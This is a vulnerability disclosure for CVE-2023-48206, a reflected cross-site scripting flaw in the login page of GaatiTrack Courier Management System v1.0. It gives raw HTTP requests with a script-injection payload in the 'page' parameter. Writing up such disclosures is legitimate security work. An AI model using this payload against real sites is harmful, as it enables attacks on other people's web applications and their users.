# Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple Cross-site scripting # Date: 12/112023 # Exploit Author: BugsBD Security Researcher (Rahad Chowdhury) # Vendor Homepage: https://www.mayurik.com/ # Software Link: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php # Version: v1.0 # Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56 # CVE: CVE-2023-48206 Description: Multiple reflected cross-site scripting (XSS) vulnerability exists in login.php, header.php page of GaatiTrack Courier Management System v1.0 that allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website login page parameter. Steps to Reproduce: 1. Go to login and capture request data using burp suite. Your request data will be: GET /gaatitrack/login.php HTTP/1.1 Host: 192.168.1.74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp Upgrade-Insecure-Requests: 1 2. Now use XSS payload in login.php. So your request data will be: GET /gaatitrack/login.php?page=1</title><script>alert(document.domain)</script> HTTP/1.1 Host: 192.168.1.74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp Upgrade-Insecure-Requests: 1 3. Forward You request data and check browser. You will be popup with domain. ## Reproduce: [href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48206)